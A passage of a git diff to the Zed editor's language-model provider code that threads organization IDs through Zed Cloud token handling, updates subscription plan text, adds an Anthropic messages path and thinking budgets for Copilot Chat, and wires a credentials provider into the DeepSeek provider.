crate::provider::anthropic::{ AnthropicEventMapper, count_anthropic_tokens_with_tiktoken, into_anthropic, @@ -55,8 +57,8 @@ use crate::provider::open_ai::{ }; use crate::provider::x_ai::count_xai_tokens; -const PROVIDER_ID: LanguageModelProviderId = language_model::ZED_CLOUD_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::ZED_CLOUD_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = ZED_CLOUD_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = ZED_CLOUD_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct ZedDotDevSettings { @@ -97,7 +99,7 @@ pub struct State { default_model: Option>, default_fast_model: Option>, recommended_models: Vec>, - _fetch_models_task: Task<()>, + _user_store_subscription: Subscription, _settings_subscription: Subscription, _llm_token_subscription: Subscription, } @@ -110,34 +112,42 @@ impl State { cx: &mut Context, ) -> Self { let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx); - let mut current_user = user_store.read(cx).watch_current_user(); + let llm_api_token = global_llm_token(cx); Self { client: client.clone(), - llm_api_token: LlmApiToken::default(), - user_store, + llm_api_token, + user_store: user_store.clone(), status, models: Vec::new(), default_model: None, default_fast_model: None, recommended_models: Vec::new(), - _fetch_models_task: cx.spawn(async move |this, cx| { - maybe!(async move { - let (client, llm_api_token) = this - .read_with(cx, |this, _cx| (client.clone(), this.llm_api_token.clone()))?; + _user_store_subscription: cx.subscribe( + &user_store, + move |this, _user_store, event, cx| match event { + client::user::Event::PrivateUserInfoUpdated => { + let status = *client.status().borrow(); + if status.is_signed_out() { + return; + } - while current_user.borrow().is_none() { - current_user.next().await; + let client = this.client.clone(); + let llm_api_token = this.llm_api_token.clone(); + let organization_id = this + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); + cx.spawn(async move |this, cx| { + let response = + Self::fetch_models(client, llm_api_token, organization_id).await?; + this.update(cx, |this, cx| this.update_models(response, cx)) + }) + .detach_and_log_err(cx); } - - let response = - Self::fetch_models(client.clone(), llm_api_token.clone()).await?; - this.update(cx, |this, cx| this.update_models(response, cx))?; - anyhow::Ok(()) - }) - .await - .context("failed to fetch Zed models") - .log_err(); - }), + _ => {} + }, + ), _settings_subscription: cx.observe_global::(|_, cx| { cx.notify(); }), @@ -146,9 +156,14 @@ impl State { move |this, _listener, _event, cx| { let client = this.client.clone(); let llm_api_token = this.llm_api_token.clone(); + let organization_id = this + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); cx.spawn(async move |this, cx| { - llm_api_token.refresh(&client).await?; - let response = Self::fetch_models(client, llm_api_token).await?; + let response = + Self::fetch_models(client, llm_api_token, organization_id).await?; this.update(cx, |this, cx| { this.update_models(response, cx); }) @@ -209,9 +224,12 @@ impl State { async fn fetch_models( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, ) -> Result { let http_client = &client.http_client(); - let token = llm_api_token.acquire(&client).await?; + let token = client + .acquire_llm_token(&llm_api_token, organization_id) + .await?; let request = http_client::Request::builder() .method(Method::GET) @@ -273,11 +291,13 @@ impl CloudLanguageModelProvider { &self, model: Arc, llm_api_token: LlmApiToken, + user_store: Entity, ) -> Arc { Arc::new(CloudLanguageModel { id: LanguageModelId(SharedString::from(model.id.0.clone())), model, llm_api_token, + user_store, client: self.client.clone(), request_limiter: RateLimiter::new(4), }) @@ -306,36 +326,46 @@ impl LanguageModelProvider for CloudLanguageModelProvider { } fn default_model(&self, cx: &App) -> Option> { - let default_model = self.state.read(cx).default_model.clone()?; - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - Some(self.create_language_model(default_model, llm_api_token)) + let state = self.state.read(cx); + let default_model = state.default_model.clone()?; + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + Some(self.create_language_model(default_model, llm_api_token, user_store)) } fn default_fast_model(&self, cx: &App) -> Option> { - let default_fast_model = self.state.read(cx).default_fast_model.clone()?; - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - Some(self.create_language_model(default_fast_model, llm_api_token)) + let state = self.state.read(cx); + let default_fast_model = state.default_fast_model.clone()?; + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + Some(self.create_language_model(default_fast_model, llm_api_token, user_store)) } fn recommended_models(&self, cx: &App) -> Vec> { - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - self.state - .read(cx) + let state = self.state.read(cx); + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + state .recommended_models .iter() .cloned() - .map(|model| self.create_language_model(model, llm_api_token.clone())) + .map(|model| { + self.create_language_model(model, llm_api_token.clone(), user_store.clone()) + }) .collect() } fn provided_models(&self, cx: &App) -> Vec> { - let llm_api_token = self.state.read(cx).llm_api_token.clone(); - self.state - .read(cx) + let state = self.state.read(cx); + let llm_api_token = state.llm_api_token.clone(); + let user_store = state.user_store.clone(); + state .models .iter() .cloned() - .map(|model| self.create_language_model(model, llm_api_token.clone())) + .map(|model| { + self.create_language_model(model, llm_api_token.clone(), user_store.clone()) + }) .collect() } @@ -367,6 +397,7 @@ pub struct CloudLanguageModel { id: LanguageModelId, model: Arc, llm_api_token: LlmApiToken, + user_store: Entity, client: Arc, request_limiter: RateLimiter, } @@ -380,12 +411,15 @@ impl CloudLanguageModel { async fn perform_llm_completion( client: Arc, llm_api_token: LlmApiToken, + organization_id: Option, app_version: Option, body: CompletionBody, ) -> Result { let http_client = &client.http_client(); - let mut token = llm_api_token.acquire(&client).await?; + let mut token = client + .acquire_llm_token(&llm_api_token, organization_id.clone()) + .await?; let mut refreshed_token = false; loop { @@ -416,7 +450,9 @@ impl CloudLanguageModel { } if !refreshed_token && response.needs_llm_token_refresh() { - token = llm_api_token.refresh(&client).await?; + token = client + .refresh_llm_token(&llm_api_token, organization_id.clone()) + .await?; refreshed_token = true; continue; } @@ -538,20 +574,20 @@ impl LanguageModel for CloudLanguageModel { fn upstream_provider_id(&self) -> LanguageModelProviderId { use cloud_llm_client::LanguageModelProvider::*; match self.model.provider { - Anthropic => language_model::ANTHROPIC_PROVIDER_ID, - OpenAi => language_model::OPEN_AI_PROVIDER_ID, - Google => language_model::GOOGLE_PROVIDER_ID, - XAi => language_model::X_AI_PROVIDER_ID, + Anthropic => ANTHROPIC_PROVIDER_ID, + OpenAi => OPEN_AI_PROVIDER_ID, + Google => GOOGLE_PROVIDER_ID, + XAi => X_AI_PROVIDER_ID, } } fn upstream_provider_name(&self) -> LanguageModelProviderName { use cloud_llm_client::LanguageModelProvider::*; match self.model.provider { - Anthropic => language_model::ANTHROPIC_PROVIDER_NAME, - OpenAi => language_model::OPEN_AI_PROVIDER_NAME, - Google => language_model::GOOGLE_PROVIDER_NAME, - XAi => language_model::X_AI_PROVIDER_NAME, + Anthropic => ANTHROPIC_PROVIDER_NAME, + OpenAi => OPEN_AI_PROVIDER_NAME, + Google => GOOGLE_PROVIDER_NAME, + XAi => X_AI_PROVIDER_NAME, } } @@ -601,7 +637,7 @@ impl LanguageModel for CloudLanguageModel { fn supports_split_token_display(&self) -> bool { use cloud_llm_client::LanguageModelProvider::*; - matches!(self.model.provider, OpenAi) + matches!(self.model.provider, OpenAi | XAi) } fn telemetry_id(&self) -> String { @@ -611,11 +647,11 @@ impl LanguageModel for CloudLanguageModel { fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { match self.model.provider { cloud_llm_client::LanguageModelProvider::Anthropic - | cloud_llm_client::LanguageModelProvider::OpenAi - | cloud_llm_client::LanguageModelProvider::XAi => { + | cloud_llm_client::LanguageModelProvider::OpenAi => { LanguageModelToolSchemaFormat::JsonSchema } - cloud_llm_client::LanguageModelProvider::Google => { + cloud_llm_client::LanguageModelProvider::Google + | cloud_llm_client::LanguageModelProvider::XAi => { LanguageModelToolSchemaFormat::JsonSchemaSubset } } @@ -670,12 +706,19 @@ impl LanguageModel for CloudLanguageModel { cloud_llm_client::LanguageModelProvider::Google => { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = self + .user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()); let model_id = self.model.id.to_string(); let generate_content_request = into_google(request, model_id.clone(), GoogleModelMode::Default); async move { let http_client = &client.http_client(); - let token = llm_api_token.acquire(&client).await?; + let token = client + .acquire_llm_token(&llm_api_token, organization_id) + .await?; let request_body = CountTokensBody { provider: cloud_llm_client::LanguageModelProvider::Google, @@ -734,8 +777,14 @@ impl LanguageModel for CloudLanguageModel { > { let thread_id = request.thread_id.clone(); let prompt_id = request.prompt_id.clone(); - let intent = request.intent; let app_version = Some(cx.update(|cx| AppVersion::global(cx))); + let user_store = self.user_store.clone(); + let organization_id = cx.update(|cx| { + user_store + .read(cx) + .current_organization() + .map(|organization| organization.id.clone()) + }); let thinking_allowed = request.thinking_allowed; let enable_thinking = thinking_allowed && self.model.supports_thinking; let provider_name = provider_name(&self.model.provider); @@ -767,6 +816,7 @@ impl LanguageModel for CloudLanguageModel { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let future = self.request_limiter.stream(async move { let PerformLlmCompletionResponse { response, @@ -774,11 +824,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::Anthropic, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -803,6 +853,7 @@ impl LanguageModel for CloudLanguageModel { cloud_llm_client::LanguageModelProvider::OpenAi => { let client = self.client.clone(); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let effort = request .thinking_effort .as_ref() @@ -818,7 +869,10 @@ impl LanguageModel for CloudLanguageModel { ); if enable_thinking && let Some(effort) = effort { - request.reasoning = Some(open_ai::responses::ReasoningConfig { effort }); + request.reasoning = Some(open_ai::responses::ReasoningConfig { + effort, + summary: Some(open_ai::responses::ReasoningSummaryMode::Auto), + }); } let future = self.request_limiter.stream(async move { @@ -828,11 +882,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::OpenAi, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -861,6 +915,7 @@ impl LanguageModel for CloudLanguageModel { None, ); let llm_api_token = self.llm_api_token.clone(); + let organization_id = organization_id.clone(); let future = self.request_limiter.stream(async move { let PerformLlmCompletionResponse { response, @@ -868,11 +923,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::XAi, model: request.model.clone(), provider_request: serde_json::to_value(&request) @@ -902,11 +957,11 @@ impl LanguageModel for CloudLanguageModel { } = Self::perform_llm_completion( client.clone(), llm_api_token, + organization_id, app_version, CompletionBody { thread_id, prompt_id, - intent, provider: cloud_llm_client::LanguageModelProvider::Google, model: request.model.model_id.clone(), provider_request: serde_json::to_value(&request) @@ -1000,12 +1055,10 @@ where fn provider_name(provider: &cloud_llm_client::LanguageModelProvider) -> LanguageModelProviderName { match provider { - cloud_llm_client::LanguageModelProvider::Anthropic => { - language_model::ANTHROPIC_PROVIDER_NAME - } - cloud_llm_client::LanguageModelProvider::OpenAi => language_model::OPEN_AI_PROVIDER_NAME, - cloud_llm_client::LanguageModelProvider::Google => language_model::GOOGLE_PROVIDER_NAME, - cloud_llm_client::LanguageModelProvider::XAi => language_model::X_AI_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::Anthropic => ANTHROPIC_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::OpenAi => OPEN_AI_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::Google => GOOGLE_PROVIDER_NAME, + cloud_llm_client::LanguageModelProvider::XAi => X_AI_PROVIDER_NAME, } } @@ -1038,7 +1091,6 @@ fn response_lines( struct ZedAiConfiguration { is_connected: bool, plan: Option, - subscription_period: Option<(DateTime, DateTime)>, eligible_for_trial: bool, account_too_young: bool, sign_in_callback: Arc, @@ -1046,33 +1098,37 @@ struct ZedAiConfiguration { impl RenderOnce for ZedAiConfiguration { fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { - let is_pro = self.plan.is_some_and(|plan| plan == Plan::ZedPro); - let subscription_text = match (self.plan, self.subscription_period) { - (Some(Plan::ZedPro), Some(_)) => { - "You have access to Zed's hosted models through your Pro subscription." - } - (Some(Plan::ZedProTrial), Some(_)) => { - "You have access to Zed's hosted models through your Pro trial." - } - (Some(Plan::ZedFree), Some(_)) => { - if self.eligible_for_trial { - "Subscribe for access to Zed's hosted models. Start with a 14 day free trial." - } else { - "Subscribe for access to Zed's hosted models." - } - } - _ => { + let (subscription_text, has_paid_plan) = match self.plan { + Some(Plan::ZedPro) => ( + "You have access to Zed's hosted models through your Pro subscription.", + true, + ), + Some(Plan::ZedProTrial) => ( + "You have access to Zed's hosted models through your Pro trial.", + false, + ), + Some(Plan::ZedStudent) => ( + "You have access to Zed's hosted models through your Student subscription.", + true, + ), + Some(Plan::ZedBusiness) => ( + "You have access to Zed's hosted models through your Organization.", + true, + ), + Some(Plan::ZedFree) | None => ( if self.eligible_for_trial { "Subscribe for access to Zed's hosted models. Start with a 14 day free trial." } else { "Subscribe for access to Zed's hosted models." - } - } + }, + false, + ), }; - let manage_subscription_buttons = if is_pro { + let manage_subscription_buttons = if has_paid_plan { Button::new("manage_settings", "Manage Subscription") .full_width() + .label_size(LabelSize::Small) .style(ButtonStyle::Tinted(TintColor::Accent)) .on_click(|_, _, cx| cx.open_url(&zed_urls::account_url(cx))) .into_any_element() @@ -1096,10 +1152,7 @@ impl RenderOnce for ZedAiConfiguration { .child(Label::new("Sign in to have access to Zed's complete agentic experience with hosted models.")) .child( Button::new("sign_in", "Sign In to use Zed AI") - .icon_color(Color::Muted) - .icon(IconName::Github) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Github).size(IconSize::Small).color(Color::Muted)) .full_width() .on_click({ let callback = self.sign_in_callback.clone(); @@ -1156,7 +1209,6 @@ impl Render for ConfigurationView { ZedAiConfiguration { is_connected: !state.is_signed_out(cx), plan: user_store.plan(), - subscription_period: user_store.subscription_period(), eligible_for_trial: user_store.trial_started_at().is_none(), account_too_young: user_store.account_too_young(), sign_in_callback: self.sign_in_callback.clone(), @@ -1187,9 +1239,6 @@ impl Component for ZedAiConfiguration { ZedAiConfiguration { is_connected, plan, - subscription_period: plan - .is_some() - .then(|| (Utc::now(), Utc::now() + chrono::Duration::days(7))), eligible_for_trial, account_too_young, sign_in_callback: Arc::new(|_, _| {}), diff --git a/crates/language_models/src/provider/copilot_chat.rs b/crates/language_models/src/provider/copilot_chat.rs index 4363430f865de63ed5fec0d6b40b085d9413fc2a..a2d39e1945e2791d9d5c998cc717a07498ebc157 100644 --- a/crates/language_models/src/provider/copilot_chat.rs +++ b/crates/language_models/src/provider/copilot_chat.rs @@ -2,15 +2,16 @@ use std::pin::Pin; use std::str::FromStr as _; use std::sync::Arc; +use anthropic::AnthropicModelMode; use anyhow::{Result, anyhow}; -use cloud_llm_client::CompletionIntent; use collections::HashMap; use copilot::{GlobalCopilotAuth, Status}; use copilot_chat::responses as copilot_responses; use copilot_chat::{ - ChatMessage, ChatMessageContent, ChatMessagePart, CopilotChat, CopilotChatConfiguration, - Function, FunctionContent, ImageUrl, Model as CopilotChatModel, ModelVendor, - Request as CopilotChatRequest, ResponseEvent, Tool, ToolCall, ToolCallContent, ToolChoice, + ChatLocation, ChatMessage, ChatMessageContent, ChatMessagePart, CopilotChat, + CopilotChatConfiguration, Function, FunctionContent, ImageUrl, Model as CopilotChatModel, + ModelVendor, Request as CopilotChatRequest, ResponseEvent, Tool, ToolCall, ToolCallContent, + ToolChoice, }; use futures::future::BoxFuture; use futures::stream::BoxStream; @@ -19,9 +20,9 @@ use gpui::{AnyView, App, AsyncApp, Entity, Subscription, Task}; use http_client::StatusCode; use language::language_settings::all_language_settings; use language_model::{ - AuthenticateError, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelCostInfo, LanguageModelId, LanguageModelName, - LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + AuthenticateError, CompletionIntent, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelCostInfo, LanguageModelEffortLevel, LanguageModelId, + LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage, LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolSchemaFormat, LanguageModelToolUse, MessageContent, RateLimiter, Role, StopReason, TokenUsage, @@ -30,7 +31,8 @@ use settings::SettingsStore; use ui::prelude::*; use util::debug_panic; -use crate::provider::util::parse_tool_arguments; +use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic}; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("copilot_chat"); const PROVIDER_NAME: LanguageModelProviderName = @@ -246,10 +248,41 @@ impl LanguageModel for CopilotChatLanguageModel { self.model.supports_tools() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_images(&self) -> bool { self.model.supports_vision() } + fn supports_thinking(&self) -> bool { + self.model.can_think() + } + + fn supported_effort_levels(&self) -> Vec { + let levels = self.model.reasoning_effort_levels(); + if levels.is_empty() { + return vec![]; + } + levels + .iter() + .map(|level| { + let name: SharedString = match level.as_str() { + "low" => "Low".into(), + "medium" => "Medium".into(), + "high" => "High".into(), + _ => SharedString::from(level.clone()), + }; + LanguageModelEffortLevel { + name, + value: SharedString::from(level.clone()), + is_default: level == "high", + } + }) + .collect() + } + fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { match self.model.vendor() { ModelVendor::OpenAI | ModelVendor::Anthropic => { @@ -323,18 +356,101 @@ impl LanguageModel for CopilotChatLanguageModel { | CompletionIntent::TerminalInlineAssist | CompletionIntent::GenerateGitCommitMessage => true, - CompletionIntent::ToolResults + CompletionIntent::Subagent + | CompletionIntent::ToolResults | CompletionIntent::ThreadSummarization | CompletionIntent::CreateFile | CompletionIntent::EditFile => false, }); + if self.model.supports_messages() { + let location = intent_to_chat_location(request.intent); + let model = self.model.clone(); + let request_limiter = self.request_limiter.clone(); + let future = cx.spawn(async move |cx| { + let effort = request + .thinking_effort + .as_ref() + .and_then(|e| anthropic::Effort::from_str(e).ok()); + + let mut anthropic_request = into_anthropic( + request, + model.id().to_string(), + 0.0, + model.max_output_tokens() as u64, + if model.supports_adaptive_thinking() { + AnthropicModelMode::Thinking { + budget_tokens: None, + } + } else if model.can_think() { + AnthropicModelMode::Thinking { + budget_tokens: compute_thinking_budget( + model.min_thinking_budget(), + model.max_thinking_budget(), + model.max_output_tokens() as u32, + ), + } + } else { + AnthropicModelMode::Default + }, + ); + + anthropic_request.temperature = None; + + // The Copilot proxy doesn't support eager_input_streaming on tools. + for tool in &mut anthropic_request.tools { + tool.eager_input_streaming = false; + } + + if model.supports_adaptive_thinking() { + if anthropic_request.thinking.is_some() { + anthropic_request.thinking = Some(anthropic::Thinking::Adaptive); + anthropic_request.output_config = Some(anthropic::OutputConfig { effort }); + } + } + + let anthropic_beta = if !model.supports_adaptive_thinking() && model.can_think() { + Some("interleaved-thinking-2025-05-14".to_string()) + } else { + None + }; + + let body = serde_json::to_string(&anthropic::StreamingRequest { + base: anthropic_request, + stream: true, + }) + .map_err(|e| anyhow::anyhow!(e))?; + + let stream = CopilotChat::stream_messages( + body, + location, + is_user_initiated, + anthropic_beta, + cx.clone(), + ); + + request_limiter + .stream(async move { + let events = stream.await?; + let mapper = AnthropicEventMapper::new(); + Ok(mapper.map_stream(events).boxed()) + }) + .await + }); + return async move { Ok(future.await?.boxed()) }.boxed(); + } + if self.model.supports_response() { + let location = intent_to_chat_location(request.intent); let responses_request = into_copilot_responses(&self.model, request); let request_limiter = self.request_limiter.clone(); let future = cx.spawn(async move |cx| { - let request = - CopilotChat::stream_response(responses_request, is_user_initiated, cx.clone()); + let request = CopilotChat::stream_response( + responses_request, + location, + is_user_initiated, + cx.clone(), + ); request_limiter .stream(async move { let stream = request.await?; @@ -346,6 +462,7 @@ impl LanguageModel for CopilotChatLanguageModel { return async move { Ok(future.await?.boxed()) }.boxed(); } + let location = intent_to_chat_location(request.intent); let copilot_request = match into_copilot_chat(&self.model, request) { Ok(request) => request, Err(err) => return futures::future::ready(Err(err.into())).boxed(), @@ -354,8 +471,12 @@ impl LanguageModel for CopilotChatLanguageModel { let request_limiter = self.request_limiter.clone(); let future = cx.spawn(async move |cx| { - let request = - CopilotChat::stream_completion(copilot_request, is_user_initiated, cx.clone()); + let request = CopilotChat::stream_completion( + copilot_request, + location, + is_user_initiated, + cx.clone(), + ); request_limiter .stream(async move { let response = request.await?; @@ -455,6 +576,23 @@ pub fn map_to_language_model_completion_events( entry.thought_signature = Some(thought_signature); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: entry.thought_signature.clone(), + }, + ))); + } + } } if let Some(usage) = event.usage { @@ -727,7 +865,7 @@ impl CopilotResponsesEventMapper { } copilot_responses::StreamEvent::GenericError { error } => vec![Err( - LanguageModelCompletionError::Other(anyhow!(format!("{error:?}"))), + LanguageModelCompletionError::Other(anyhow!(error.message)), )], copilot_responses::StreamEvent::Created { .. } @@ -740,6 +878,9 @@ fn into_copilot_chat( model: &CopilotChatModel, request: LanguageModelRequest, ) -> Result { + let temperature = request.temperature; + let tool_choice = request.tool_choice; + let mut request_messages: Vec = Vec::new(); for message in request.messages { if let Some(last_message) = request_messages.last_mut() { @@ -838,10 +979,9 @@ fn into_copilot_chat( let text_content = { let mut buffer = String::new(); for string in message.content.iter().filter_map(|content| match content { - MessageContent::Text(text) | MessageContent::Thinking { text, .. } => { - Some(text.as_str()) - } - MessageContent::ToolUse(_) + MessageContent::Text(text) => Some(text.as_str()), + MessageContent::Thinking { .. } + | MessageContent::ToolUse(_) | MessageContent::RedactedThinking(_) | MessageContent::ToolResult(_) | MessageContent::Image(_) => None, @@ -898,21 +1038,53 @@ fn into_copilot_chat( .collect::>(); Ok(CopilotChatRequest { - intent: true, n: 1, stream: model.uses_streaming(), - temperature: 0.1, + temperature: temperature.unwrap_or(0.1), model: model.id().to_string(), messages, tools, - tool_choice: request.tool_choice.map(|choice| match choice { + tool_choice: tool_choice.map(|choice| match choice { LanguageModelToolChoice::Auto => ToolChoice::Auto, - LanguageModelToolChoice::Any => ToolChoice::Any, + LanguageModelToolChoice::Any => ToolChoice::Required, LanguageModelToolChoice::None => ToolChoice::None, }), + thinking_budget: None, }) } +fn compute_thinking_budget( + min_budget: Option, + max_budget: Option, + max_output_tokens: u32, +) -> Option { + let configured_budget: u32 = 16000; + let min_budget = min_budget.unwrap_or(1024); + let max_budget = max_budget.unwrap_or(max_output_tokens.saturating_sub(1)); + let normalized = configured_budget.max(min_budget); + Some( + normalized + .min(max_budget) + .min(max_output_tokens.saturating_sub(1)), + ) +} + +fn intent_to_chat_location(intent: Option) -> ChatLocation { + match intent { + Some(CompletionIntent::UserPrompt) => ChatLocation::Agent, + Some(CompletionIntent::Subagent) => ChatLocation::Agent, + Some(CompletionIntent::ToolResults) => ChatLocation::Agent, + Some(CompletionIntent::ThreadSummarization) => ChatLocation::Panel, + Some(CompletionIntent::ThreadContextSummarization) => ChatLocation::Panel, + Some(CompletionIntent::CreateFile) => ChatLocation::Agent, + Some(CompletionIntent::EditFile) => ChatLocation::Agent, + Some(CompletionIntent::InlineAssist) => ChatLocation::Editor, + Some(CompletionIntent::TerminalInlineAssist) => ChatLocation::Terminal, + Some(CompletionIntent::GenerateGitCommitMessage) => ChatLocation::Other, + None => ChatLocation::Panel, + } +} + fn into_copilot_responses( model: &CopilotChatModel, request: LanguageModelRequest, @@ -928,7 +1100,7 @@ fn into_copilot_responses( tool_choice, stop: _, temperature, - thinking_allowed: _, + thinking_allowed, thinking_effort: _, speed: _, } = request; @@ -940,38 +1112,26 @@ fn into_copilot_responses( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let output = if let Some(out) = &tool_result.output { - match out { - serde_json::Value::String(s) => { - responses::ResponseFunctionOutput::Text(s.clone()) - } - serde_json::Value::Null => { - responses::ResponseFunctionOutput::Text(String::new()) - } - other => responses::ResponseFunctionOutput::Text(other.to_string()), + let output = match &tool_result.content { + LanguageModelToolResultContent::Text(text) => { + responses::ResponseFunctionOutput::Text(text.to_string()) } - } else { - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - responses::ResponseFunctionOutput::Text(text.to_string()) - } - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - responses::ResponseFunctionOutput::Content(vec![ - responses::ResponseInputContent::InputImage { - image_url: Some(image.to_base64_url()), - detail: Default::default(), - }, - ]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - responses::ResponseFunctionOutput::Text( + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + responses::ResponseFunctionOutput::Content(vec![ + responses::ResponseInputContent::InputImage { + image_url: Some(image.to_base64_url()), + detail: Default::default(), + }, + ]) + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + responses::ResponseFunctionOutput::Text( "[Tool responded with an image, but this model does not support vision]".into(), ) - } } } }; @@ -1096,7 +1256,7 @@ fn into_copilot_responses( let mapped_tool_choice = tool_choice.map(|choice| match choice { LanguageModelToolChoice::Auto => responses::ToolChoice::Auto, - LanguageModelToolChoice::Any => responses::ToolChoice::Any, + LanguageModelToolChoice::Any => responses::ToolChoice::Required, LanguageModelToolChoice::None => responses::ToolChoice::None, }); @@ -1107,10 +1267,18 @@ fn into_copilot_responses( temperature, tools: converted_tools, tool_choice: mapped_tool_choice, - reasoning: None, // We would need to add support for setting from user settings. + reasoning: if thinking_allowed { + Some(copilot_responses::ReasoningConfig { + effort: copilot_responses::ReasoningEffort::Medium, + summary: Some(copilot_responses::ReasoningSummary::Detailed), + }) + } else { + None + }, include: Some(vec![ copilot_responses::ResponseIncludable::ReasoningEncryptedContent, ]), + store: false, } } diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index 2a9f7322b1fb5d3d1e6713c5a084b83dc2b01ce2..0cfb1af425c7cb0279d98fa124a589437f1bb1a1 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use deepseek::DEEPSEEK_API_URL; use futures::Stream; @@ -22,7 +23,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("deepseek"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("DeepSeek"); @@ -49,6 +50,7 @@ pub struct DeepSeekLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -57,30 +59,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = DeepSeekLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = DeepSeekLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl DeepSeekLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -246,6 +269,10 @@ impl LanguageModel for DeepSeekLanguageModel { true } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { true } @@ -327,15 +354,25 @@ pub fn into_deepseek( for message in request.messages { for content in message.content { match content { - MessageContent::Text(text) => messages.push(match message.role { - Role::User => deepseek::RequestMessage::User { content: text }, - Role::Assistant => deepseek::RequestMessage::Assistant { - content: Some(text), - tool_calls: Vec::new(), - reasoning_content: current_reasoning.take(), - }, - Role::System => deepseek::RequestMessage::System { content: text }, - }), + MessageContent::Text(text) => { + let should_add 